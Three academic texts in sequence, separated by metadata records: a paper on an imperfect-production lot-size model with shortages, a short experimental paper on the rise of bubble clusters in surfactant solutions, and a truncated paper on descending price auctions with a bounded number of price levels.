Several researchers have devoted their time and efforts to analyzing various problems related to imperfect production processes. According to Rosenblatt and Lee (1986), the time of shift from the 'in-control' state to the 'out-of-control' state follows an exponential distribution with mean 1/m, where m is assumed to be small. They derived an Economic Manufacture Quantity (EMQ) formula using an approximation up to the second order of the Maclaurin series expansion of the exponential function. Lee and Rosenblatt (1987, 1989), on the basis of the RL model (Rosenblatt and Lee, 1986), determined an optimal production run time and an optimal inspection policy simultaneously to monitor the production process. Cheng (1991) derived a closed-form expression for the optimal demand to satisfy order quantity and process reliability when demand exceeds supply and the production process is imperfect. Khouja and Mehrez (1994) considered the elapsed time until the production process shifts to an 'out-of-control' state to be an exponentially distributed random variable; the results of that model indicate the possibility of both weak and strong relationships between the rate of production and process quality. Hariga and Ben-Daya (1998) and Kim and Hong (1999) extended the RL model by considering a general shift-time distribution, and the optimal production run time was shown to be unique. Makis (1998) studied several properties of the optimal production and inspection policies in an imperfect production process. Some of the above models allow defective items to be reworked instantaneously at a cost. Wang (2004) extended the imperfect EMQ model discussed by Yeh et al. (2000), in which products are repaired and sold under a free-repair warranty policy (i.e., with the cost incurred by a defective item after its sale), to consider a general shift distribution. Sheu and Chen (2004) and Lee (2005a-c) extended the model to increase the service level and reduce defectives in an imperfect production system with imperfect product quality and imperfect supplied quantity. Chen and Lo (2006) developed an imperfect production system with allowable shortage in which the products are sold with a free minimal-repair warranty; the probabilities of non-conforming items in the two states ('out-of-control' and 'in-control') are different, and they formulated a cost-minimization model in which the production run length and the time at which the back-order is replenished are decision variables. Lee (2006) presented an investment model with respect to repetitive inspections and measurement equipment in an imperfect production process. Sana et al. (2007a) extended an Economic Production Lot Size (EPLS) model that accounts for a production system producing items of both perfect and imperfect quality; the probability of imperfect-quality items increases with the production-run time because of machinery problems, impatience of labour staff and improper distribution of raw materials. They assumed that the demand rate of perfect-quality items is constant, whereas the demand rate of defective items that are not repaired is a function of the reduction rate. In another model, Sana et al. (2007b) developed a volume-flexible inventory model for an imperfect production system in which the demand rate of conforming-quality items is a random variable and the demand rate of defective items is a function of a random variable and the reduction rate.
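For reference, the approximation mentioned for the RL-type derivations is the standard second-order Maclaurin expansion of the exponential term (a textbook identity, not reproduced from the cited paper):

```latex
e^{-mt} \;\approx\; 1 - mt + \tfrac{1}{2}(mt)^{2}, \qquad mt \ll 1 .
```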
Giri and Dohi (2007) studied the problem of inspection scheduling in an imperfect production process in which the manufacturing process may shift from the 'in-control' state to the 'out-of-control' state. The shift time follows an arbitrary probability distribution with increasing hazard (failure) rate, and the products are sold with a free minimal-repair warranty. The inspection process monitors the production process, which in turn reduces the number of imperfect-quality products. Liao (2007) investigated an imperfect production process that requires production corrections and imperfect maintenance. Two states of the production process occur, namely state I ('out-of-control') and state II ('in-control'). In the 'out-of-control' state, the product is not perfect, and a part is rejected (reworking is impossible) with probability q; the product is perfect (of good quality) with probability (1 − q). The mean loss cost due to reproduction through production correction, per total expected cost until the (N + 1)th 'out-of-control' state is entered, is determined. Lo et al. (2007) extended a production-inventory model from the perspectives of both the manufacturer and the retailer. They assumed a varying rate of deterioration, partial back-ordering, inflation, an imperfect production process and multiple deliveries. The elapsed time until the production process shifts to imperfect production is assumed to be exponentially distributed (as in Khouja and Mehrez, 1994). Panda et al. (2008) modeled an Economic Production Lot Size model for imperfect items in which the production rate is a fixed quantity and the demand rate is probabilistic, under budget and shortage constraints. They also assumed that the percentage of defective items is stochastic and that the uncertainty in the constraints is stochastic or fuzzy; in this case, the percentage of defective items is independent of the production rate and the production-run time. Lee (2008) developed a maintenance model for a multi-level, multi-stage system. According to this model, the investment in preventive maintenance reduces the variance and the deviation of the mean from the target value of the quality characteristics, which reduces the proportion of defectives and increases the reliability of the product. The proportion of defectives can be linked to the cost of manufacturing, the cost of inventory and the loss of profit. The total costs in this model include the cost of manufacturing, the setup cost, the holding cost, the loss of profit and the warranty cost.
In most EOQ (Economic Order Quantity) models, the assumption is that 100% of produced units are of good (perfect) quality. This unrealistic assumption may not be valid for any production environment. Schwaller (1988) presented a procedure that extends EOQ models by adding the assumptions that defectives of a known proportion are present in incoming lots and that fixed and variable inspection costs are incurred in finding and removing those items. Zhang and Gerchak (1990) considered a joint lot-sizing and inspection policy under an EOQ model in which a random proportion of units are defective; these defectives cannot be used and thus must be replaced by non-defective ones. Khouja and Mehrez (1994) developed an EPLS model with imperfect quality, taking the percentage of defective items as a product of the production rate and the production-run time. Salameh and Jaber (2000) developed an economic production/inventory quantity model for items with imperfect quality, assuming that poor-quality items are sold as a single batch at the end of a 100% screening process. Hayek and Salameh (2001) derived simple expressions for the expected profit per unit time and the optimal order quantity. Khouja and Mehrez (1994), Chung and Hou (2003) and some other researchers have used a function for the percentage of defective items that is a product of the production rate and the production-run time. Sana (2010) assumed that the percentage of defective items varies non-linearly with the production rate and the production-run time.
All of the above-mentioned models assume that shortages are not permitted to occur. Nevertheless, in many practical situations, stock-outs are unavoidable due to various uncertainties; the occurrence of shortage in inventory is therefore a natural phenomenon. The main purpose of this paper is to generalize Sana (2010) by allowing shortages. In addition, we consider a selling price that depends on the unit production cost, which is important in many realistic practical situations. We also include the screening cost of items during the production process, since it should not be neglected.
The cycle starts with a shortage. After a certain time, production begins at a variable production rate and continues up to an optimal time. During the production-run time, the manufacturing process may shift to an 'out-of-control' state after a shift time that follows an exponential distribution. In the 'out-of-control' state, a percentage of the produced items is defective; the defective items are reworked immediately at a cost. We then formulate a profit function and maximize it, taking the production lot size and the production rate as decision variables.
The paper is organized as follows: Section 2 presents fundamental assumptions and notation. Section 3 formulates the model. Section 4 provides numerical examples. Sensitivity analysis is discussed in Section 5. Section 6 concludes the paper.
Fundamental Assumptions and Notations
The following assumptions and notations are considered to develop the model.

Assumptions:
1) At the start of each production cycle, the production process is always in an in-control state and perfect items are produced.
2) The production process may shift from the in-control state to an out-of-control state; during the out-of-control state, imperfect-quality items are produced, and these are reworked immediately at a cost.
3) The elapsed time until the shift is arbitrarily distributed with known mean and variance.
4) The rate of production and the lot size are decision variables.
5) The lead time is zero.
6) Shortage is completely backordered.
7) The model is developed for a single item.

Here the total lot size is Q, so the production time is t3 − t2 = Q/P. In the model, the production process is so adjusted that the items produced at the beginning of production are of conforming quality up to a certain time (greater than t2 − t1), i.e., the in-control state, after which the production process shifts to an out-of-control state. In the out-of-control state, some of the produced items are of non-conforming quality. The production rate of defective items is α(t, P) percent of the production rate P, where α(t, P) is a non-linear increasing function of both the production-run time t and the production rate P. The exponential distribution has often been used to describe the elapsed time to failure of many components of a machinery system, and the mean time to failure is a decreasing function of P. The model therefore evaluates, in turn, the expected number of defective items in a production lot of size Q, the shortage cost during the interval t1, the shortage cost during the interval t2, the average inventory during the interval t3, and the total inventory cost for a cycle of length T.
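To make the role of the exponential shift time concrete, the following is a minimal Monte Carlo sketch of the expected number of defectives per lot. It is our own illustration, not the paper's closed-form derivation; the defective-fraction function alpha(t, P), the failure intensity f(P) and all parameter values are hypothetical:

```python
import numpy as np

rng = np.random.default_rng(42)

P = 1200.0        # production rate (units/time), hypothetical
Q = 600.0         # lot size, hypothetical
T_run = Q / P     # production-run time
f_P = 0.02 * P    # failure intensity f(P), increasing in P (assumed form)

def alpha(t, P):
    # Hypothetical defective fraction, increasing in run time and rate
    return min(0.3, 1e-4 * P + 0.2 * t)

n_sim = 20_000
defectives = np.empty(n_sim)
for i in range(n_sim):
    tau = rng.exponential(1.0 / f_P)   # shift time, mean 1/f(P)
    if tau >= T_run:
        defectives[i] = 0.0            # process stayed in control
    else:
        # Defectives accumulate at rate alpha(t, P) * P after the shift
        ts = np.linspace(tau, T_run, 100)
        rates = np.array([alpha(t, P) * P for t in ts])
        defectives[i] = rates.mean() * (T_run - tau)  # simple quadrature

print(f"expected defectives per lot ~ {defectives.mean():.1f}")
```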
Numerical Examples
Notation used in the tables: * indicates the optimal solution; nc indicates no change in the solution; IC, inventory cost; RC, rework cost; SC, setup cost.
Sensitivity Analysis
From the sensitivity analysis of Example 1 (see Table 1), the following observations are made.

1. The optimal production rate P* and the lot size Q* increase with increases in g. It is quite natural that the optimal production rate is higher for higher labour/energy costs, keeping in mind the minimization of the production cost.
As the production rate increases, the lot size Q automatically increases, which results in a higher inventory cost. Here, the change in the production rate is larger than that in the lot size, which gives a lower production-run time. Consequently, the total rework cost and setup cost are higher in spite of the higher production rate.

2. With increases in tool/die costs, the optimal production rate decreases, which results in a lower lot size and inventory cost. It is also obvious that a lower production rate and lot size reduce the total rework cost and setup cost, and a lower production rate causes a higher unit production cost (a cost form making these two directions explicit is sketched after this list).
3. With increases in α, the production rate increases and the lot size decreases. A smaller lot size causes a lower inventory cost and a higher setup cost, as the total demand is fixed. A higher production rate produces more defective items, which results in a higher rework cost.
4. P*, RC* and SC* increase, and Q*, IC* and E* decrease, with increases in R. Although the production-run time decreases with increases in R, the number of defective items is higher due to the higher production rate, which results in a higher rework cost. Also, the lower lot size reduces the inventory cost and the setup cost.
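These opposing directions for the labour/energy and tool/die parameters are consistent with a common volume-flexibility form of the unit production cost. The expression below is our own illustrative assumption (r: raw-material cost, g: labour/energy cost, θ: tool/die cost), not necessarily the exact function used in this paper:

```latex
c(P) = r + \frac{g}{P} + \theta P,
\qquad
\frac{dc}{dP} = -\frac{g}{P^{2}} + \theta = 0
\;\Longrightarrow\;
P^{*} = \sqrt{\frac{g}{\theta}} .
```

Under this form the cost-minimizing rate rises with g and falls with θ, matching observations 1 and 2 above.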
Conclusion
In this paper, we propose a generalized production lot size model with backordering. Our model extends the approach of Sana (2010) to consider permissible shortages with backordering. We have maintained the originality of the model of Sana (2010), who argued that, given the ongoing addition of new technology, the introduction of more robotics and automation, the increasing use of computer-aided devices, etc., the likelihood of an 'out-of-control' state is even higher at higher production rates. During the 'out-of-control' state, the process starts to produce defective items, and as the rate of production increases, more defective items are produced. Generally speaking, the probability of defective items increases with the production-run time because of machinery problems, impatience of labour staff and improper distribution of raw materials. Also, in a long-run production process, the percentage of defective items increases with both the production rate and the production-run time. From this point of view, we have considered the rate of production of defective items (as a percentage of total production) to be a non-linear function of both the production rate and the production-run time. The probability distribution of the shift time from the 'in-control' state to the 'out-of-control' state follows an exponential distribution with mean 1/f(P), where f(P) is an increasing function of P. In the existing literature, this percentage is usually considered a fixed constant throughout the production cycle. The defective items are reworked at a cost in a separate cell to restore their original quality; the reworking cost is measured by wasted materials, labour, equipment time and other resources. We have recovered the final results of the model of Sana (2010) as a particular case (Special case 2). We have incorporated shortages, a selling price dependent on the unit production cost, and a screening cost, and have found the optimal values of the total cost and the other costs in this situation. We have also determined the time periods for the different stages, namely the shortage period, the backlogging period, the production-run time, the demand-only period, and the total cycle time. The optimal lot size and production rate are obtained by numerical techniques, and the effects of the key parameters are studied in the sensitivity analysis section.
| 2018-10-16T16:33:57.830Z | 2016-01-01T00:00:00.000 | {
"year": 2016,
"sha1": "9ce42f49d6e43cd8725bedc1fe9b9708a4e1f9dc",
"oa_license": null,
"oa_url": "https://doi.org/10.21275/v5i2.15021603",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "1963e4629c275d4502a8c88b145b63b030abcfeb",
"s2fieldsofstudy": [
"Business",
"Economics"
],
"extfieldsofstudy": []
} |
105742565 | pes2o/s2orc | v3-fos-license | An experimental study of the dynamics of ascent of the bubble system in the presence of a surfactant
Abstract. This paper presents a new experimental setup for obtaining a compact cluster of monodisperse bubbles of a given diameter. We also provide the results of an experimental study of the floating-up of a bubble cluster in the presence of a surfactant over a wide range of Reynolds numbers. A comparison is made between the dynamics of the floating-up of a monodisperse bubble cluster in a glycerol medium and in a glycerol medium supplemented with a surfactant.
Introduction
The behavior of a fluid containing bubbles differs distinctly from that of a homogeneous fluid under various physical and physico-chemical influences. These differences are widely exploited in industry: boiling, heat transfer in two-phase media, cavitation, foaming, and flotation. The generation of a bubble cluster of a given size arises in a number of problems, in particular, in studies of the ignition of electric discharge in fluids by means of specially created cavitation bubbles [1] and of the effect of surfactants and acoustic waves on the dynamics of bubble clusters [2,3].
In two-phase flows with deformable particles of the disperse phase (droplet and bubble flows), an important role is played by the properties of the interface, in particular, the surface tension coefficient. One of the physical factors affecting the boundary conditions is the presence of surfactants, which can change the criterial dependencies for the motion of a disperse-phase particle by an order of magnitude. On the free boundary of a bubble or droplet moving in a liquid medium with a surfactant, tangential Marangoni capillary forces arise, contributing to an increase in the drag coefficient of the particle. The problems arising in studying the patterns of motion and deformation of bubbles (or droplets) in a liquid containing a surfactant are formulated in [4,5].
The regularities of bubble motion in the presence of surfactants have been investigated mainly for a single bubble [6,7]. In contrast to those works, we present the results of an experimental study of the ascent dynamics of a set of spherical air bubbles in the presence of surface-active substances over the Reynolds number range Re = 0.001-30, together with a generalization of the data on the drag coefficient of a group of bubbles.
The scheme of the experimental setup
An experimental setup for studying the ascent dynamics of a cluster of monodisperse bubbles in the presence of surfactants is shown in Fig. 1. The setup comprises a reservoir 1 with the liquid; in its lower part, air bubbles are produced by device 2, which is connected by a tube 4 to a compressed-air reservoir 5 whose pressure is supplied to device 2 through a microreducer 6 with a control manometer 7 and a reducer 8. In addition, a separate container 9 is connected to the tube 4 through a reducer 10 and a tee 11; it creates a positive pressure that prevents the working fluid from flowing into device 2. The device 2 for obtaining a monodisperse cluster of bubbles is made in the form of a collector with perforations in the top cover, starting from the center and running along equidistant concentric circles, which makes it possible to obtain an axisymmetric bubble cluster. Microtubes 13 of identical diameter, installed in the perforations, provide the formation of monodisperse bubbles. Microtubes of the same height, located along each of the concentric circles, provide simultaneous formation of a "ring" of bubbles for each circle. The linear decrease in the height of the microtubes with increasing circle radius ensures the sequential formation of each "ring" of bubbles with the same time delay as the rings move away from the center of the collector cover, which makes it possible to obtain a compact cluster with a uniform spatial distribution of bubbles.
Results of the experimental study
In the experimental studies, the number of bubbles n = 1-69 and their diameters D = 3-7 mm in a monodisperse cluster were varied, as well as the spatial arrangement of the bubbles [8]. Distilled water and water-glycerol solutions were used as the liquids; sodium dodecyl sulfate and potassium stearate were used as the surfactants.
The visualization results were converted to a coordinate format for further analysis. Fig. 2 shows a typical view of the spatial arrangement of bubbles at different ascent times (n = 5, D = 3.9 mm).
Fig. 2. Coordinates of the bubble locations at different times (t = 0, 9.5 s).
The results of the experimental investigation of the ascent of a single bubble (n = 1) in the presence of surfactant are consistent with the known works on this topic and show that the bubble rise regime changes. The new regime corresponds to the motion of a solid particle: the Stokes law at Reynolds numbers Re < 1 and the Klyachko law for Re > 1.

Fig. 3. Drag coefficient of a group of bubbles as a function of the Reynolds number (1 is the Stokes dependence; 2 is the empirical dependence with the surfactant; 3 is the Hadamard-Rybczynski dependence; 4 is the empirical dependence without surfactant).
To assess the effect of the presence of surfactant in a liquid on the dynamics of the ascent of a group of bubbles, two series of experiments were carried out: in a pure liquid (without surfactant) and in the presence of a surfactant (Fig. 3).
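The reference curves 1 and 3 in Fig. 3 are classical drag laws. The following is a minimal sketch of these laws for comparison; the formulas are standard textbook correlations quoted here for illustration (in particular, the Klyachko form is an assumption of this sketch, not taken from this paper):

```python
import numpy as np

# Classical drag-law references (curves 1 and 3 in Fig. 3), assumed standard forms.
def cd_stokes(re):
    # Solid sphere in creeping flow (strictly valid for Re << 1)
    return 24.0 / re

def cd_hadamard_rybczynski(re):
    # Clean (surfactant-free) gas bubble in creeping flow
    return 16.0 / re

def cd_klyachko(re):
    # Klyachko correlation for a solid sphere at moderate Re (assumed form)
    return (24.0 / re) * (1.0 + re ** (2.0 / 3.0) / 6.0)

for re in np.array([0.01, 0.1, 1.0, 10.0, 30.0]):
    print(f"Re={re:6.2f}  C_D(Stokes)={cd_stokes(re):9.1f}  "
          f"C_D(H-R)={cd_hadamard_rybczynski(re):9.1f}  "
          f"C_D(Klyachko)={cd_klyachko(re):9.1f}")
```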
In experiments on the ascent of a group of bubbles in glycerin without surfactant additives, a volume concentration C > 0.002 was found to correspond to the onset of the "partially blown" cloud regime. An empirical dependence of the drag coefficient C_D on the Reynolds number was obtained for a group of bubbles moving in glycerin without surfactant additives in the region Re < 1 (curve 4 in Fig. 3).
The empirical dependence of the drag coefficient on the Reynolds number for a group of bubbles rising in glycerin with the addition of surfactant is shown as curve 2 in Fig. 3.
It was found that the effect of surfactants on the dynamics of bubble ascent is determined by the Reynolds number. At Re < 1, the change of the bubble rise regime occurs at a lower surfactant concentration than at Re > 1.
Conclusion
There is a certain critical value of the surfactant concentration in the liquid at which the bubble ascent regime changes. The critical concentration is a function of the bubble size: with increasing bubble size, the critical concentration increases.
The presence of surfactant leads to an increase in the coefficient of resistance by 33% and, accordingly, to a decrease in the ascent rate of a single bubble. In this case, the law of resistance changes from the Hadamard-Rybczynski formula to the Stokes formula.
Empirical relationships have been obtained for the drag coefficient of a group of bubbles rising in a liquid with and without a surfactant.
The ascent rate of a group of bubbles in a liquid containing a surfactant was found to be lower than that of a group of bubbles in a pure liquid.
This study was supported by the Russian Science Foundation (Project No. 15-19-10014). | 2019-04-10T13:11:48.810Z | 2018-01-01T00:00:00.000 | {
"year": 2018,
"sha1": "f1db682c9467f81ade55fde1ef1bf4b7dcdb40bc",
"oa_license": "CCBY",
"oa_url": "https://www.matec-conferences.org/articles/matecconf/pdf/2018/53/matecconf_hmttsc2018_01002.pdf",
"oa_status": "GOLD",
"pdf_src": "Adhoc",
"pdf_hash": "1980ee036d33da47233e658e60257a586778ebed",
"s2fieldsofstudy": [
"Engineering",
"Chemistry",
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
247222724 | pes2o/s2orc | v3-fos-license | Descending Price Auctions with Bounded Number of Price Levels and Batched Prophet Inequality
We consider descending price auctions for selling $m$ units of a good to unit demand i.i.d. buyers where there is an exogenous bound of $k$ on the number of price levels the auction clock can take. The auctioneer's problem is to choose price levels $p_1>p_2>\cdots>p_{k}$ for the auction clock such that the auction's expected revenue is maximized. The price levels are announced prior to the auction. We reduce this problem to a new variant of prophet inequality, which we call \emph{batched prophet inequality}, where a decision-maker chooses $k$ (decreasing) thresholds and then sequentially collects rewards (up to $m$) that are above the thresholds with ties broken uniformly at random. For the special case of $m=1$ (i.e., selling a single item), we show that the resulting descending auction with $k$ price levels achieves $1- 1/e^k$ of the unrestricted (without the bound of $k$) optimal revenue. That means a descending auction with just 4 price levels can achieve more than 98\% of the optimal revenue. We then extend our results for $m>1$ and provide a closed-form bound on the competitive ratio of our auction as a function of the number of units $m$ and the number of price levels $k$.
Introduction
The descending price auction (DPA) is strategically equivalent to the celebrated first price auction, a powerful machinery in auction design that has passed the test of time in the history of practical auctions [Milgrom, 2004]. In a stark contrast to posted pricing mechanisms, this auction induces competition among the buyers. This competition in turn helps with increasing the generated revenue, to the extent that in a symmetric independent private value setting for selling a single item this auction (with an appropriate reserve price) is revenue optimal. While there are other auction formats, such as the second price auction, that induce competition and enjoy similar revenue benefits compared to DPA, there is a long list of reasons why DPA is more practically appealing: pay-as-bid is a simple, transparent, and interpretable rule, and it makes the auctioneer more credible, as descending price auctions are "automatically self-policing" [Vickrey, 1961, Akbarpour and Li, 2020]. Furthermore, buyers reveal the minimum information about their private valuations in DPA compared to other auction formats. The major disadvantage of DPA, as with other clock auctions, is its requirement of many rounds of communication between the auctioneer and the buyers.
Another simple and highly prevalent selling mechanism in practice is posted pricing. Notably, posted pricing requires the minimum communication between the auctioneer and the buyers and reveals even less information about the buyers valuations than DPA, and is even a simpler mechanism in many ways. At the same time, it can be perceived as a special case of DPA with a single price level. As a result, it enjoys almost all other practical appeals of DPA such as transparency and credibility; however, its performance is not optimal (both in terms of revenue and welfare) due to the lack of competition among the buyers.
The above paradigm motivates us to study the impact of having a constraint on the number of rounds of DPA and to evaluate how this constraint changes the competition, and hence the revenue/welfare performance of the resulting mechanism.
To this end, we consider the class of descending price auctions with a bounded number of price levels. In this new auction format, the auctioneer commits to a distinct set of k ∈ N prices p 1 > p 2 > . . . > p k for an exogenously specified k. During each round i ∈ [k] of the auction, the remaining supply is offered for sale at price p i to all interested buyers in a random order. All sales are private and not revealed to other buyers. The auction terminates once all units are sold or at the end of round k whichever happens first. This auction interpolates between the descending price auction with a reserve price, which can achieve the optimal revenue, and anonymous posted pricing, which is sub-optimal in general. We then ask the following design questions: By using at most k distinct price levels, how well can a k-level descending price auction approximate the optimal mechanism? Is there a simple sequence of k prices that can approximate the optimal mechanism in a parametric fashion?
In this paper, we answer these questions in the affirmative. In particular, we consider a general setting with multiple unit-demand symmetric buyers with independent private values and multiple identical items. We then show how to design a simple sequence of prices to approximate the optimal mechanism. We also quantify the extent of the approximation as a function of the number of price levels. Interestingly, we show that the revenue of a k-level DPA with properly designed prices converges to the optimal revenue exponentially fast as k goes to infinity. This result greatly extends the applicability of descending price auctions with a bounded number of price levels, as the optimal mechanism is very well approximated by this class of mechanisms, even for small values of k. We also obtain similar results for the welfare objective through a different sequence of prices.
Main Contribution
We start by formulating the descending price auction with k price levels. In this problem, there are n ≥ 1 unit-demand buyers whose values are drawn i.i.d. from a known distribution, and an auctioneer who sells m units of a good. The auctioneer announces a sequence of k (decreasing) prices and then, after observing their values, buyers decide about their bid (from this set of prices).
The auctioneer then goes over the prices in decreasing order over k rounds. If the bids of multiple buyers are equal to the posted price in a round, the (remaining) items go to a subset of them chosen uniformly at random. Finally, the auctioneer charges each winning buyer her submitted bid.
After establishing the existence of a (symmetric) Bayes-Nash equilibrium for buyers and characterizing its properties, we turn to our main question: what is the revenue approximation factor of a descending price auction with k posted prices in selling m ∈ N items. The mathematical definition of approximation in this paper is a standard one from the design and analysis of algorithms and mechanisms (see, e.g., Hartline [2012]). For Γ ∈ [0, 1], a k-DPA is a Γ-approximation for the setting with m items and multiple buyers with i.i.d. values if for all instances of this problem the performance, i.e., the expected revenue, of k-DPA is within a multiplicative Γ fraction of the performance of the optimal mechanism for that instance.
To guide the analysis, we introduce a new class of prophet inequality [Krengel and Sucheston, 1978, Samuel-Cahn, 1984], and refer to it as the batched prophet inequality. In this new problem, all random rewards are drawn at time 0. The decision-maker decides about k different thresholds for k rounds and can take m rewards. At each round, if all the rewards are below that round's threshold, the game advances to the next round. Otherwise, the decision-maker wins all of the rewards that have passed the threshold. If the number of rewards above the threshold is larger than the remaining number of rewards (out of m) that the decision-maker can take, then she only collects a subset of these rewards to fill her capacity m, breaking ties in this selection uniformly at random. The game proceeds until the decision-maker selects m rewards or after k rounds. The goal of the decision-maker is to choose k thresholds such that the expected value of the collected rewards is a good approximation of the expected value of the sum of the top m rewards (i.e., the expected reward when all the variables are known).
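To make the rules of the game concrete, the following is a minimal Monte Carlo sketch of the batched prophet inequality with capacity m; the distribution, thresholds, and parameters below are illustrative placeholders, not the thresholds designed later in the paper.

```python
import random

def batched_prophet(thresholds, m, n, sample, trials=100_000):
    """Estimate ALG (playing the thresholds) and OPT (sum of top m) by simulation."""
    alg_total, opt_total = 0.0, 0.0
    for _ in range(trials):
        rewards = [sample() for _ in range(n)]
        opt_total += sum(sorted(rewards, reverse=True)[:m])
        remaining, collected, capacity = rewards, 0.0, m
        for tau in thresholds:              # k rounds with decreasing thresholds
            passing = [v for v in remaining if v >= tau]
            random.shuffle(passing)         # ties broken uniformly at random
            chosen = passing[:capacity]
            collected += sum(chosen)
            capacity -= len(chosen)
            if capacity == 0:
                break
            remaining = [v for v in remaining if v < tau]
        alg_total += collected
    return alg_total / trials, opt_total / trials

# Illustrative run: n = 20 i.i.d. Uniform[0,1] rewards, m = 3 units, k = 4 rounds.
alg, opt = batched_prophet([0.9, 0.8, 0.7, 0.6], m=3, n=20, sample=random.random)
print(f"ALG ~ {alg:.3f}, OPT ~ {opt:.3f}, ratio ~ {alg / opt:.3f}")
```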
Our first main result, stated next, proves a reduction from the revenue approximation problem for k-DPA to the batched prophet inequality problem.
Main Result 1 (informal):
Any algorithm for the batched prophet inequality with k rounds and capacity m that achieves a Γ(k, m) approximation of the expected sum of the top m rewards can be used to generate a sequence of k prices for the k-DPA whose expected revenue is a Γ(k, m) approximation of the optimal expected revenue for selling m items.
Building on this result, we then develop the analysis of the batched prophet inequality for m = 1 item and m > 1 items separately as they require different techniques. The following summarizes our result for a single item.
Main Result 2 (informal):
There exists a sequence of k thresholds that achieves 1 − 1/e^k of the optimal expected reward for the batched prophet inequality. This implies the existence of k prices, so that their corresponding k-DPA achieves 1 − 1/e^k of the optimal revenue.
The main idea of the proof is to construct a sequence of prices that balances the tradeoff between having a high revenue from the current round (by selecting a large threshold in the batched prophet problem) and having a high probability of collecting future rewards (by selecting a small threshold in the batched prophet problem). There are three points worth mentioning. First, we provide an algorithm that explicitly finds the sequence of thresholds that achieves the competitive ratio 1 − 1/e^k for the batched prophet inequality. Second, we also explicitly characterize the sequence of prices for k-DPA that achieves 1 − 1/e^k of the optimal revenue. Third, our approximation factor for the batched prophet inequality is optimal for k = 1. In particular, for k = 1, our batched prophet inequality becomes identical to the classic prophet inequality for i.i.d. rewards (or the homogeneous prophet secretary problem) with a static policy: the sequence of random variables arrive in a random order and the decision-maker selects the first reward that is above a static threshold. This problem has been studied in Correa et al. [2017], Ehsani et al. [2018], and Lee and Singla [2018], where the authors establish the existence of a distribution for rewards such that no single threshold policy can achieve better than 1 − 1/e of the optimal expected reward. We then consider the generalization of our setting to selling multiple items (i.e., m > 1).
Again, we first prove that the problem of approximating the optimal revenue reduces to a batched prophet inequality in which the decision-maker can acquire up to m rewards. We then provide an algorithm for approximating the optimal expected reward in the batched prophet inequality. The following summarizes our result for multiple items.
Main Result 3 (informal):
For any ǫ > 0, there exists a sequence of k thresholds that achieves a closed-form fraction (depending on m and k) of the optimal expected reward for the batched prophet inequality when the number of rewards (corresponding to buyers) is large enough. This implies the existence of k prices, so that their corresponding k-DPA achieves the same approximation of the optimal revenue.
Again, a noteworthy point is that our approximation factor for the batched prophet inequality with m > 1 items is also optimal for k = 1. In particular, for k = 1 and m > 1, our batched prophet inequality problem becomes identical to the prophet inequality for i.i.d. rewards (or the homogeneous prophet secretary problem) with a static policy when the decision-maker can collect m rewards. This problem has been studied in Yan [2011] and Arnosti and Ma [2021], where the authors establish the existence of a distribution for rewards such that no single threshold policy can achieve better than 1 − e^{-m} m^m/m! of the optimal expected reward, and show this approximation factor can be achieved by a single threshold. As a side note, our analysis for the setting with multiple items can be viewed as an extension of the results of Arnosti and Ma [2021] to any k > 1 by using a different, and arguably simpler, analysis.
Our main focus is on approximating the optimal revenue. However, we show that our analysis provides the above approximations for the optimal welfare as well.
Further Related Literature
Besides the papers discussed earlier in the introduction, our paper is related to the vast literature on Bayesian mechanism design in computer science, economics, and operations. We sketch some of these connections below.
Simple vs. optimal Our paper relates to the literature that studies simple mechanisms that approximate the optimal mechanism; representative papers are Chawla et al. [2007] and Hartline and Roughgarden [2009], which study variants of (sequential) posted pricing under a variety of assumptions on the underlying value distributions. In particular, Chawla et al. [2007] consider a unit-demand multidimensional screening problem and identify a simple item pricing that is approximately optimal, and Alaei et al. [2019] prove that an anonymous posted price can achieve 1/e of the optimal auction for regular, independent, and non-identical values (see also Hartline [2012] for a survey of earlier works in this literature). We depart from this literature by stepping away from posted pricing and studying the performance of a descending clock auction with multiple price levels. As we establish in the paper, both our analysis and results are different from the above papers.
First price/descending clock auctions with discrete bids/price levels On one extreme of our auction formats, we have anonymous posted pricing, whose (sub)optimality has been extensively studied in the literature, as mentioned earlier. On the other extreme, and closer to ours, are Chwe [1989] and Hörner and Samuelson [2011], which consider the first price auction with discrete bids and prove that, when the distribution of the underlying values is uniform and the discrete bids (over time) are multiples of an increment, the auctioneer's revenue converges to the optimal revenue as the number of discrete bids goes to infinity. Our paper considers the interpolation between these two extremes and aims to understand the performance guarantee of a descending price auction with multiple posted prices. In particular, we depart from these papers by asking the following question: what is the "best" approximation that the auctioneer can achieve by considering k discrete bids (that are not restricted to be multiples of an increment)? By building connections to the batched prophet inequality problem, we establish that, for general distributions, by properly choosing the sequence of discrete bids the auctioneer's revenue converges exponentially fast to the optimal revenue, and we characterize its parametric convergence rate in terms of the number of price levels and items.
Another work that is related to ours in spirit is Nguyen and Sandholm [2014]. They consider a framework for optimizing prices in a multi-item descending clock auction in which the auctioneer is a buyer selecting sellers who provide different items within a feasibility constraint, in order to minimize the expected payment. Our work diverges from this paper as we consider a different setting and objective (optimizing prices under feasibility vs. approximation-ratio analysis with respect to the optimal auction); however, their percentile-based price decrements have the same flavor as our price trajectories in Section 3.3.
Prophet inequality Our paper also relates to the rich literature on prophet inequality. In the vanilla version of this problem, a decision-maker sequentially observes rewards drawn independently from known distributions, and decides when to stop and take the reward to maximize her expected collected reward. Prophet inequality was first introduced and analyzed in Krengel and Sucheston [1978], Hill and Kertz [1982], and Samuel-Cahn [1984] and further developed in Babaioff et al. [2007], Kleinberg and Weinberg [2012], Azar et al. [2014], and Dutting et al.

Organization: The rest of the paper proceeds as follows. In Section 2, we present our problem formulation and formally define the descending price auction with k price levels (which we call k-DPA).
We then introduce batched prophet inequality and prove that k-DPA reduces to it. In Section 3, we consider batched prophet inequality with a single item and prove that the decision-maker can achieve 1 − 1/e k of the optimal expected reward. We then use this solution to design a k-DPA with the same approximation factor for the optimal expected revenue. In Section 4, we extend our analysis of the batched prophet inequality and k-DPA to a setting with multiple items. Section 5 concludes, while the Appendix presents the omitted proofs from the text.
Problem Formulation, Equilibrium, and Reduction
We start by formalizing our setting (Section 2.1) and revenue maximization problem (Section 2.2).
We then characterize the equilibrium behaviour of the buyers (Section 2.3) and show how our problem reduces to a variant of the prophet inequality problem (Section 2.4).
The Environment
